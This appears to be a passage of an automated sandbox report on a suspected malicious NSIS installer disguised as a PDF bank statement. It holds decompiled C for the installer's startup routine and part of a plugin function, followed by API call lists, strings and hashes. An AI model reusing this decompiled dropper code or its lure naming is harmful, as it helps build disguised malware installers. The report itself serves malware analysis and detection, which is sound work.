				void* _t199;
				signed char* _t213;
				CHAR* _t217;
				void* _t223;

				_v20 = 0;
				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v12 = 0;
				_v16 = 0x20;
				SetErrorMode(0x8001); // executed
				_v196.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v196.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v196) != 0) {
					L3:
					_t223 = _v196.dwPlatformId - 2;
					L4:
					if(_t223 < 0) {
						_v42 = _v42 & 0x00000000;
						if(_v175 < 0x41) {
							_v48 = 0;
						} else {
							_v48 = _v175 - 0x40;
						}
					}
					if(_v196.dwMajorVersion < 0xa) {
						_v182 = _v182 & 0x00000000;
					}
					 *0x7c6018 = _v196.dwBuildNumber;
					 *0x7c601c = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
					if( *0x7c601e != 0x600) {
						_t159 = E00406640(0);
						if(_t159 != 0) {
							 *_t159(0xc00);
						}
					}
					_t217 = "UXTHEME";
					goto L14;
					while(1) {
						L37:
						_t179 =  *_t95;
						_t234 = _t179;
						if(_t179 == 0) {
							break;
						}
						__eflags = _t179 - 0x20;
						if(_t179 != 0x20) {
							L23:
							__eflags =  *_t95 - 0x22;
							_v16 = 0x20;
							if( *_t95 == 0x22) {
								_t95 = _t95 + 1;
								__eflags = _t95;
								_v16 = 0x22;
							}
							__eflags =  *_t95 - 0x2f;
							if( *_t95 != 0x2f) {
								L35:
								_t95 = E00405BF1(_t95, _v16);
								__eflags =  *_t95 - 0x22;
								if(__eflags == 0) {
									_t95 = _t95 + 1;
									__eflags = _t95;
								}
								continue;
							} else {
								_t95 = _t95 + 1;
								__eflags =  *_t95 - 0x53;
								if( *_t95 != 0x53) {
									L30:
									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
										L34:
										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
											__eflags = _t95 + 2;
											E00406234(0x7f1000, _t95 + 2);
											L40:
											GetTempPathA(0x2000, 0x7f9000); // executed
											_t99 = E0040335F(_t234);
											_t235 = _t99;
											if(_t99 != 0) {
												L43:
												DeleteFileA(0x7f7000); // executed
												_t101 = E00402F0C(_t237, _v12); // executed
												_v8 = _t101;
												if(_t101 != 0) {
													L53:
													E00403940();
													__imp__OleUninitialize();
													_t248 = _v8;
													if(_v8 == 0) {
														__eflags =  *0x7c5ff4;
														if( *0x7c5ff4 == 0) {
															L77:
															_t103 =  *0x7c600c;
															__eflags = _t103 - 0xffffffff;
															if(_t103 != 0xffffffff) {
																_v20 = _t103;
															}
															ExitProcess(_v20);
														}
														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
														__eflags = _t106;
														if(_t106 != 0) {
															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
															_v40.PrivilegeCount = 1;
															_v28 = 2;
															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
														}
														_t107 = E00406640(4);
														__eflags = _t107;
														if(_t107 == 0) {
															L75:
															_t108 = ExitWindowsEx(2, 0x80040002);
															__eflags = _t108;
															if(_t108 != 0) {
																goto L77;
															}
															goto L76;
														} else {
															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
															__eflags = _t110;
															if(_t110 == 0) {
																L76:
																E0040140B(9);
																goto L77;
															}
															goto L75;
														}
													}
													E0040594A(_v8, 0x200010);
													ExitProcess(2);
												}
												if( *0x7c5f7c == _t101) {
													L52:
													 *0x7c600c =  *0x7c600c | 0xffffffff;
													_v20 = E00403A1A( *0x7c600c);
													goto L53;
												}
												_t213 = E00405BF1(0x7ef000, _t101);
												if(_t213 < 0x7ef000) {
													L49:
													_t244 = _t213 - 0x7ef000;
													_v8 = "Error launching installer";
													if(_t213 < 0x7ef000) {
														_t173 = E004058B5(_t248);
														lstrcatA(0x7f9000, "~nsu");
														if(_t173 != 0) {
															lstrcatA(0x7f9000, "A");
														}
														lstrcatA(0x7f9000, ".tmp");
														if(lstrcmpiA(0x7f9000, 0x7f5000) != 0) {
															_push(0x7f9000);
															if(_t173 == 0) {
																E00405898();
															} else {
																E0040581B();
															}
															SetCurrentDirectoryA(0x7f9000);
															if( *0x7f1000 == 0) {
																E00406234(0x7f1000, 0x7f5000);
															}
															E00406234(0x7c7000, _v24);
															_t194 = "A";
															_v12 = 0x1a;
															 *0x7c9000 = "A";
															do {
																E004062C7(_t173, 0x7a6d28, 0x7f9000, 0x7a6d28,  *((intOrPtr*)( *0x7c5f70 + 0x120)));
																DeleteFileA(0x7a6d28);
																_t173 = 0;
																if(_v8 != 0 && CopyFileA(0x7fd000, 0x7a6d28, ?str?) != 0) {
																	E0040600D(_t194, 0x7a6d28, 0);
																	E004062C7(0, 0x7a6d28, 0x7f9000, 0x7a6d28,  *((intOrPtr*)( *0x7c5f70 + 0x124)));
																	_t134 = E004058CD(0x7a6d28);
																	if(_t134 != 0) {
																		CloseHandle(_t134);
																		_v8 = 0;
																	}
																}
																 *0x7c9000 =  *0x7c9000 + 1;
																_t62 =  &_v12;
																 *_t62 = _v12 - 1;
															} while ( *_t62 != 0);
															E0040600D(_t194, 0x7f9000, _t173);
														}
														goto L53;
													}
													 *_t213 =  *_t213 & 0x00000000;
													_t214 =  &(_t213[4]);
													if(E00405CB4(_t244,  &(_t213[4])) == 0) {
														goto L53;
													}
													E00406234(0x7f1000, _t214);
													E00406234("C:\\Users\\Arthur\\procharity\\Anasarca\\Uncompelled\\Bendixs\\Bavnene24\\Punkerne\\Zaffer", _t214);
													_v8 = _v8 & 0x00000000;
													goto L52;
												}
												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
												while( *_t213 != _t150) {
													_t213 = _t213 - 1;
													if(_t213 >= 0x7ef000) {
														continue;
													}
													goto L49;
												}
												goto L49;
											}
											GetWindowsDirectoryA(0x7f9000, 0x1ffb);
											lstrcatA(0x7f9000, "\\Temp");
											_t153 = E0040335F(_t235);
											_t236 = _t153;
											if(_t153 != 0) {
												goto L43;
											}
											GetTempPathA(0x1ffc, 0x7f9000);
											lstrcatA(0x7f9000, "Low");
											SetEnvironmentVariableA("TEMP", 0x7f9000);
											SetEnvironmentVariableA("TMP", 0x7f9000);
											_t158 = E0040335F(_t236);
											_t237 = _t158;
											if(_t158 == 0) {
												goto L53;
											}
											goto L43;
										}
										goto L35;
									}
									_t198 =  *((intOrPtr*)(_t95 + 4));
									__eflags = _t198 - 0x20;
									if(_t198 == 0x20) {
										L33:
										_t42 =  &_v12;
										 *_t42 = _v12 | 0x00000004;
										__eflags =  *_t42;
										goto L34;
									}
									__eflags = _t198;
									if(_t198 != 0) {
										goto L34;
									}
									goto L33;
								}
								_t199 =  *(_t95 + 1);
								__eflags = _t199 - 0x20;
								if(_t199 == 0x20) {
									L29:
									 *0x7c6000 = 1;
									goto L30;
								}
								__eflags = _t199;
								if(_t199 != 0) {
									goto L30;
								}
								goto L29;
							}
						} else {
							goto L22;
						}
						do {
							L22:
							_t95 = _t95 + 1;
							__eflags =  *_t95 - 0x20;
						} while ( *_t95 == 0x20);
						goto L23;
					}
					goto L40;
					L14:
					E004065D2(_t217); // executed
					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
					if( *_t217 != 0) {
						goto L14;
					} else {
						E00406640(0xb);
						 *0x7c5f64 = E00406640(9);
						_t87 = E00406640(7);
						if(_t87 != 0) {
							_t87 =  *_t87(0x1e);
							if(_t87 != 0) {
								 *0x7c601c =  *0x7c601c | 0x00000080;
							}
						}
						__imp__#17(_t170);
						__imp__OleInitialize(0); // executed
						 *0x7c6020 = _t87;
						SHGetFileInfoA(0x7a8d28, 0,  &_v548, 0x160, 0); // executed
						E00406234(0x7c1f60, "NSIS Error");
						E00406234(0x7ef000, GetCommandLineA());
						 *0x7c5f60 = 0x400000;
						_t93 = 0x7ef000;
						if( *0x7ef000 == 0x22) {
							_v16 = 0x22;
							_t93 = 0x7ef001;
						}
						_t95 = CharNextA(E00405BF1(_t93, _v16));
						_v24 = _t95;
						goto L37;
					}
				}
				_v196.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v196);
				if(_v196.dwPlatformId != 2) {
					goto L4;
				} else {
					_v42 = 4;
					asm("sbb eax, eax");
					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
					goto L3;
				}
			}

0x004033a2
0x004033a5
0x004033ac
0x004033af
0x004033b3
0x004033c6
0x004033cc
0x004033cf
0x004033d2
0x004033e0
0x00403421
0x00403421
0x00403428
0x00403428
0x0040342a
0x00403435
0x00403448
0x00403437
0x00403442
0x00403442
0x00403435
0x00403453
0x00403455
0x00403455
0x0040346a
0x0040348f
0x0040349d
0x004034a0
0x004034a7
0x004034ae
0x004034ae
0x004034a7
0x004034b0
0x004034b0
0x00403637
0x00403637
0x00403637
0x00403639
0x0040363b
0x00000000
0x00000000
0x0040357b
0x0040357e
0x00403586
0x00403586
0x00403589
0x0040358d
0x0040358f
0x0040358f
0x00403590
0x00403590
0x00403594
0x00403597
0x00403628
0x0040362c
0x00403631
0x00403634
0x00403636
0x00403636
0x00403636
0x00000000
0x0040359d
0x0040359d
0x0040359e
0x004035a1
0x004035b9
0x004035e4
0x004035e6
0x004035f8
0x00403623
0x00403626
0x00403643
0x00403647
0x00403650
0x00403655
0x00403666
0x00403668
0x0040366d
0x0040366f
0x004036c7
0x004036cc
0x004036d5
0x004036dc
0x004036df
0x00403772
0x00403772
0x00403777
0x00403780
0x00403783
0x004038ac
0x004038b2
0x0040392a
0x0040392a
0x0040392f
0x00403932
0x00403934
0x00403934
0x0040393a
0x0040393a
0x004038c1
0x004038c7
0x004038c9
0x004038d5
0x004038e6
0x004038ed
0x004038f4
0x004038f4
0x004038fc
0x00403901
0x00403908
0x00403916
0x00403919
0x0040391f
0x00403921
0x00000000
0x00000000
0x00000000
0x0040390a
0x00403910
0x00403912
0x00403914
0x00403923
0x00403925
0x00000000
0x00403925
0x00000000
0x00403914
0x00403908
0x00403791
0x00403798
0x00403798
0x004036eb
0x00403763
0x00403763
0x0040376f
0x00000000
0x0040376f
0x004036f4
0x004036f8
0x0040372e
0x0040372e
0x00403730
0x00403737
0x004037a9
0x004037ab
0x004037b2
0x004037ba
0x004037ba
0x004037c5
0x004037d9
0x004037dd
0x004037de
0x004037e7
0x004037e0
0x004037e0
0x004037e0
0x004037ed
0x004037fa
0x00403802
0x00403802
0x0040380f
0x00403814
0x0040381e
0x00403832
0x00403838
0x00403844
0x0040384a
0x00403850
0x00403855
0x0040386b
0x0040387c
0x00403882
0x00403889
0x0040388c
0x00403892
0x00403892
0x00403889
0x00403895
0x0040389b
0x0040389b
0x0040389b
0x004038a2
0x004038a2
0x00000000
0x004037d9
0x00403739
0x0040373c
0x00403747
0x00000000
0x00000000
0x0040374f
0x0040375a
0x0040375f
0x00000000
0x0040375f
0x00403723
0x00403725
0x00403729
0x0040372c
0x00000000
0x00000000
0x00000000
0x0040372c
0x00000000
0x00403725
0x00403677
0x00403683
0x00403688
0x0040368d
0x0040368f
0x00000000
0x00000000
0x00403697
0x0040369f
0x004036b0
0x004036b8
0x004036ba
0x004036bf
0x004036c1
0x00000000
0x00000000
0x00000000
0x004036c1
0x00000000
0x00403626
0x004035e8
0x004035eb
0x004035ee
0x004035f4
0x004035f4
0x004035f4
0x004035f4
0x00000000
0x004035f4
0x004035f0
0x004035f2
0x00000000
0x00000000
0x00000000
0x004035f2
0x004035a3
0x004035a6
0x004035a9
0x004035af
0x004035af
0x00000000
0x004035af
0x004035ab
0x004035ad
0x00000000
0x00000000
0x00000000
0x004035ad
0x00000000
0x00000000
0x00000000
0x00403580
0x00403580
0x00403580
0x00403581
0x00403581
0x00000000
0x00403580
0x00000000
0x004034b5
0x004034b6
0x004034c2
0x004034c9
0x00000000
0x004034cb
0x004034cd
0x004034db
0x004034e0
0x004034e7
0x004034eb
0x004034ef
0x004034f1
0x004034f1
0x004034ef
0x004034f9
0x00403500
0x00403506
0x0040351e
0x0040352e
0x00403540
0x0040354c
0x00403556
0x00403558
0x0040355a
0x0040355e
0x0040355e
0x0040356d
0x00403573
0x00000000
0x00403573
0x004034c9
0x004033e8
0x004033f3
0x004033fc
0x00000000
0x004033fe
0x00403411
0x00403417
0x0040341d
0x00000000
0x0040341d

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004033B3
GetVersionExA.KERNEL32(?), ref: 004033DC
GetVersionExA.KERNEL32(0000009C), ref: 004033F3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BC
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034F9
OleInitialize.OLE32(00000000), ref: 00403500
SHGetFileInfoA.SHELL32(007A8D28,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
GetCommandLineA.KERNEL32(007C1F60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
CharNextA.USER32(00000000,007EF000,00000020,007EF000,00000000,?,00000007,00000009,0000000B), ref: 0040356D
GetTempPathA.KERNELBASE(00002000,007F9000,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403666
GetWindowsDirectoryA.KERNEL32(007F9000,00001FFB,?,00000007,00000009,0000000B), ref: 00403677
lstrcatA.KERNEL32(007F9000,\Temp,?,00000007,00000009,0000000B), ref: 00403683
GetTempPathA.KERNEL32(00001FFC,007F9000,007F9000,\Temp,?,00000007,00000009,0000000B), ref: 00403697
lstrcatA.KERNEL32(007F9000,Low,?,00000007,00000009,0000000B), ref: 0040369F
SetEnvironmentVariableA.KERNEL32(TEMP,007F9000,007F9000,Low,?,00000007,00000009,0000000B), ref: 004036B0
SetEnvironmentVariableA.KERNEL32(TMP,007F9000,?,00000007,00000009,0000000B), ref: 004036B8
DeleteFileA.KERNELBASE(007F7000,?,00000007,00000009,0000000B), ref: 004036CC
OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403777
ExitProcess.KERNEL32 ref: 00403798
lstrcatA.KERNEL32(007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037AB
lstrcatA.KERNEL32(007F9000,0040A14C,007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037BA
lstrcatA.KERNEL32(007F9000,.tmp,007F9000,~nsu,007EF000,00000000,?,?,00000007,00000009,0000000B), ref: 004037C5
lstrcmpiA.KERNEL32(007F9000,007F5000), ref: 004037D1
SetCurrentDirectoryA.KERNEL32(007F9000,007F9000,?,00000007,00000009,0000000B), ref: 004037ED
DeleteFileA.KERNEL32(007A6D28,007A6D28,?,007C7000,?,?,00000007,00000009,0000000B), ref: 0040384A
CopyFileA.KERNEL32(007FD000,007A6D28,?), ref: 0040385F
CloseHandle.KERNEL32(00000000,007A6D28,007A6D28,?,007A6D28,00000000,?,00000007,00000009,0000000B), ref: 0040388C
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BA
OpenProcessToken.ADVAPI32(00000000), ref: 004038C1
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038D5
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004038F4
ExitWindowsEx.USER32(00000002,80040002), ref: 00403919
ExitProcess.KERNEL32 ref: 0040393A

Strings

", xrefs: 00403590
UXTHEME, xrefs: 004034B0, 004034B5, 004034BB
Low, xrefs: 00403699
.tmp, xrefs: 004037BF
\Temp, xrefs: 0040367D
(mz, xrefs: 0040382B
C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer, xrefs: 00403755
~nsu, xrefs: 004037A3
SeShutdownPrivilege, xrefs: 004038CF
TMP, xrefs: 004036B3
`K}v, xrefs: 004036A4
TEMP, xrefs: 004036AB
Error launching installer, xrefs: 00403730
A, xrefs: 0040342E
NSIS Error, xrefs: 00403524

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "$(mz$.tmp$A$C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K}v$~nsu
API String ID: 1000954069-1041315264
Opcode ID: 4b3ecca13ad1d89bf27461f46d4b6a4bca2dd1a776d39315b104c0e5dc413868
Instruction ID: 7e74485806d2b793dcf709e060cc566b5fe55edb9541ac3c3a81dfed3b1f634f
Opcode Fuzzy Hash: 4b3ecca13ad1d89bf27461f46d4b6a4bca2dd1a776d39315b104c0e5dc413868
Instruction Fuzzy Hash: 22E1C470904254AADB21AF759D49B6F7FB89F46306F0480BEF541B62D2CB7C4A44CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 6EC92288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6EC92288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E6EC912C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E6EC912C6();
				_t238 = E6EC9152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t382 = GlobalAlloc(0x40, 0x14a4);
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E6EC91326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E6EC912D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t288 = _t391 + 1;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
										_t288 = _t383 + 1;
										__eflags =  *_t288 - 0x3e;
										if( *_t288 != 0x3e) {
											goto L122;
										}
										 *(_t392 + 0x34) = 3;
										goto L125;
									}
									__eflags = _t283 - 0x3a;
									if(_t283 != 0x3a) {
										goto L121;
									}
									goto L117;
								}
								_t341 = _t337 - 1;
								__eflags = _t341;
								if(_t341 == 0) {
									_t313 =  *(_t392 + 0x30);
									L49:
									_t291 = _t241 + 0xffffffde;
									__eflags = _t291 - 0x55;
									if(_t291 > 0x55) {
										goto L129;
									}
									_t76 = _t291 + 0x6ec92b1c; // 0x6ec9402c
									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M6EC92A94))) {
										case 0:
											__esi =  *(__esp + 0x14);
											__ecx =  *(__esp + 0x14);
											__dl =  *((intOrPtr*)(__esp + 0x13));
											while(1) {
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												L86:
												__eflags =  *(__ebp + 1) - __dl;
												if( *(__ebp + 1) != __dl) {
													L91:
													 *__ecx = 0;
													__esi = E6EC912AF(__esi);
													goto L92;
												}
												L87:
												__eflags = __al;
												if(__al == 0) {
													goto L91;
												}
												__eflags = __al - __dl;
												if(__al == __dl) {
													__ebp = __ebp + 1;
													__eflags = __ebp;
												}
												__al =  *__ebp;
												 *__ecx =  *__ebp;
												__ecx = __ecx + 1;
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												goto L86;
											}
										case 1:
											L46:
											 *(_t392 + 0x18) = 1;
											goto L129;
										case 2:
											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
											goto L129;
										case 3:
											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
											__eax = 0;
											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
											__ebx = __ebx + 1;
											__eax = 1;
											 *(__esp + 0x30) = __ebx;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											goto L129;
										case 4:
											__eflags =  *(__esp + 0x20);
											if( *(__esp + 0x20) != 0) {
												goto L129;
											}
											 *(__esp + 0x24) = __ebp;
											__esi = E6EC912C6();
											__eax = __esp + 0x24;
											_push(__esi);
											__eax = E6EC91B4C(__eax);
											_push(__edx);
											_push(__eax);
											__eax = E6EC9144D(__ecx);
											__esp = __esp + 0xc;
											goto L80;
										case 5:
											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
											goto L129;
										case 6:
											_push(7);
											goto L74;
										case 7:
											_push(0x19);
											goto L101;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L58;
										case 9:
											_push(0x15);
											goto L101;
										case 0xa:
											_push(0x16);
											goto L101;
										case 0xb:
											_push(0x18);
											goto L101;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L69;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L61;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
